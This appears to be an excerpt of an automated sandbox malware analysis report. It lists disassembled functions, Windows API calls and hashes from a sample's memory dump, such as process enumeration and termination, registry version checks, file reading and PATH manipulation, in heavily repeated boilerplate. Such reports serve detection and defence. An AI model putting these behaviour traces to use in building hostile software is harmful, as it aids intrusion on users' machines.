                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ??2@$CrackInternetlstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID: <
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1683549937-4251816714
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3faf70162065b2b5d66401e6876932f283fd09493073698b7d88525b6b45388b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 160db8237089610cf3963e488d7c28046b69bb3d6c402c1973a99714a059ae02
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3faf70162065b2b5d66401e6876932f283fd09493073698b7d88525b6b45388b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F2149B1D00219ABDF14DFA5EC4AADD7B75FF04320F008229F925A7290EB706A19CF95
                                                                                                                                                                                                                                                                                                                                  Function 004199A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004199C5
                                                                                                                                                                                                                                                                                                                                  • Process32First.KERNEL32(0040A056,00000128), ref: 004199D9
                                                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(0040A056,00000128), ref: 004199F2
                                                                                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00419A4E
                                                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00419A6C
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00419A79
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(0040A056), ref: 00419A88
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2696918072-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 88ad4043d03276f3ee8d31f644ab7db47d0d0c060b431017ba6a9ada5f45e9a4
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06211A70900258ABDB25DFA1DC98BEEB7B9BF48304F0041C9E509A6290D7789FC4CF51
                                                                                                                                                                                                                                                                                                                                  Function 00417820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417834
                                                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041783B
                                                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,00799A38,00000000,00020119,00000000), ref: 0041786D
                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(00000000,007A0818,00000000,00000000,?,000000FF), ref: 0041788E
                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00417898
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                                                  • String ID: Windows 11
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3466090806-2517555085
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 90abcce2ecfc2a5b8cd512a74185dd25ab23219ddadcc09848e79f4871c60c5e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD01A274E09304BBEB00DBE4ED49FAE7779EF48700F00419AFA04A7290E7749A40CB55
                                                                                                                                                                                                                                                                                                                                  Function 004178B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004178C4
                                                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 004178CB
                                                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,00799A38,00000000,00020119,00417849), ref: 004178EB
                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(00417849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041790A
                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00417849), ref: 00417914
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                                                  • String ID: CurrentBuildNumber
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3466090806-1022791448
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4c9302de3449b24d107dc6acc84b9b99571be3b3dcaa7f8b3677a924de38e7e6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51014FB5E45309BBEB00DBE4DC4AFAEB779EF44700F10459AF605A6281E774AA408B91
                                                                                                                                                                                                                                                                                                                                  Function 00414300 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00414325
                                                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,007A0DB0,00000000,00020119,?), ref: 00414344
                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,007A14C8,00000000,00000000,00000000,000000FF), ref: 00414368
                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00414372
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414397
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A1438), ref: 004143AB
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2623679115-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5ab39f87e3c408f2a90f24169347c873da2d30c2c471e45419c7dcdc3ee26daa
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 95163f332e2e8486d22fa14c8026e7b1b291c890fe90cbe7f90fb3e747a5c624
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ab39f87e3c408f2a90f24169347c873da2d30c2c471e45419c7dcdc3ee26daa
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B641B8B6D001086BDB14EBA0EC46FEE773DAB8C300F04855EB7155A1C1EA7557888BE1
                                                                                                                                                                                                                                                                                                                                  Function 004137B0 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 004137D8
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00413921
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,0079D738,?,004210F4,?,00000000), ref: 0041AB3B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpystrtok_s$lstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3184129880-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9427a83d445ad1439700fa60a783cb58af5f8f950aa96d22ac96c416c68fe3e3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b6ea97cb77591b20574b5f8bad6a91ea9d9e82a59cceccb6aeafc47a8efa6348
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9427a83d445ad1439700fa60a783cb58af5f8f950aa96d22ac96c416c68fe3e3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9541A471E101099BCB04EFA5D945AEEB779AF44314F00801EF51677291EB78AA84CFAA
                                                                                                                                                                                                                                                                                                                                  Function 0040A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                                                                                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2311089104-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c10e185b19b0ff83e2983ec5469219cf5e992cbc5adeb5ef612d6f2a5bb5a1b7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e28607e9d9a2a96074382c0c0d30a82733061daf82e5a8752830093732aacc78
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c10e185b19b0ff83e2983ec5469219cf5e992cbc5adeb5ef612d6f2a5bb5a1b7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9731FC74A01209EFDB14CF94D845BEE77B5AB48304F10815AE911AB3D0D778AA91CFA6
                                                                                                                                                                                                                                                                                                                                  Function 0040A7D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116libraryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(0079D7B8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,004102B3), ref: 0040A7ED
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(007A0DD0,?,?,?,?,?,?,?,?,?,?,?,004102B3), ref: 0040A876
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,0079D738,?,004210F4,?,00000000), ref: 0041AB3B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                  • SetEnvironmentVariableA.KERNEL32(0079D7B8,00000000,00000000,?,0042137C,?,004102B3,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00420B0A), ref: 0040A862
                                                                                                                                                                                                                                                                                                                                  Strings
